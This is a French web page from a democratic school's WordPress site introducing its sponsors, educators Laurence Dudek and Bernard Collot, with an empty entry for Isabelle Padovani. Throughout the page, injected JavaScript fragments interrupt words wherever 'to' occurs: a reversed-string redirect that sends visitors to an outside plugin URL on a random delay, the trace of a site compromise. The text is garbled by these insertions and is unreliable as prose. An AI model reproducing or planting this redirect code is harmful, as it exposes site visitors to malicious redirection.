nos marraines et nos parrains

Ce sont des personnes qui nous inspirent et qui nourrissent notre projet. Ce sont des références extérieures précieuses qui nous accompagnent dans notre cheminement. Elles sont des invité·e·s permanent·e·s dans l’école et reçoivent de nos nouvelles plusieurs fois par an.

Ce sont des personnes qui ont accepté de nous soutenir, de la manière qui leur convient : en cautionnant notre projet, en nous envoyant des messages d’encouragement, en nous faisant des retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tours, en nous offrant des temps de supervision, de formation, d’accompagnement…

On les remercie fort et on vous les présente…


toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor »/>

Laurence Dudek

C’est qui ?

Formée en psychopédagogie et psychothérapie, elle propose de l’accompagnement thérapeutique pour les adultes, les enfants, les familles, les couples.. Elle anime des ateliers de conseil en éducation. Ce qui nous intéresse particulièrement, c’est qu’elle est aussi l’auteure de la méthode « Éducation efficace » : une mise en application pratique de la bienveillance éducative. Son livre « Parents bienveillants, enfants éveillés – les 10 clés de l’Éducation Efficace » et son groupe Facebook foisonnent des repères théoriques et d’exemples pratiques que nous trouvons particulièrement utiles pour nous positionner en tant que facilitatrices.

Qu’est-ce qui nous inspire ?

  • Sa grille de lecture pour analyser nos galères quotidiennes de parents ou d’éducatrices.
  • Ses réponses concrètes pour augmenter notre pouvoir d’agir dans le respect de notre éthique.
  • Son positionnement clair et assumé sur la question des violences éducatives ordinaires et de la domination adulte.
  • Sa détermination à déconstruire les idées reçues, à proposer un autre cadre de pensée, à affirmer qu’une autre éducation est possible.
  • Son argumentation pour nous aider à renoncer à nos privilèges d’adultes qui prend en compte la nécessité d’obtenir des résultats (c’est-à-dire une relation apaisée et vivifiante avec les enfants que nous accompagnons).

Ce qu’elle a envie de nous dire :


toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor »/>

Bernard Collot

C’est qui ?

Ancien instit’ en classe unique et militant Freinet, il a développé et théorisé une autre approche de l’école et de l’acte éducatif sous le nom « d’école du 3ème type ». Sa finalité ? Contribuer à la construction de l’enfant en adulte autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonome, disposant des outils de l’autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonomie pour être et agir dans une société où il ne sera pas passif. Pour nous, une école démocratique est une école du 3ème type. Ses témoignages, réflexions, questionnements qu’il partage avec générosité sur son blog nous passionnent.

Qu’est-ce qui nous inspire ?

  • Son humilité, la mise en avant du tatônnement expérimental à toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les niveaux
  • Sa vigilance à rester dans le vivant, le mouvement, à travailler avec ce qui est là et pas l’idéal qu’on peut projeter sur un tel projet.
  • Ses partages d’expérience d’école démocratique en milieu rural, et notamment ses récits de ce qui a permis aux parents et aux habitant·e·s de se retrouver dans le projet, d’y contribuer…
  • Sa grille de lecture systémique et permaculturelle, qui nous décentre et nous donne de la légèreté.
  • Sa capacité à faire des liens, avec l’Histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toire, avec les Sciences, avec l’actualité, avec les enseignant·e·s du public autant que les porteurs et porteuses de projet d’écoles alternatives…
  • Ses formulations qui résonnent tellement justes, qui donnent à voir et à penser
  • Ses réflexions politiques sur le système éducatif et la société actuelle, son questionnement sur le sens des choses

Ce qu’il a envie de nous dire :


toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor »/>

Isabelle Padovani

C’est qui ?

Qu’est-ce qui nous inspire ?

Ce qu’elle a envie de nous dire :


toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor »/>

Fièrement propulsé par WordPress | Thème : Baskerville 2 par Anders Noren.

Retour en haut ↑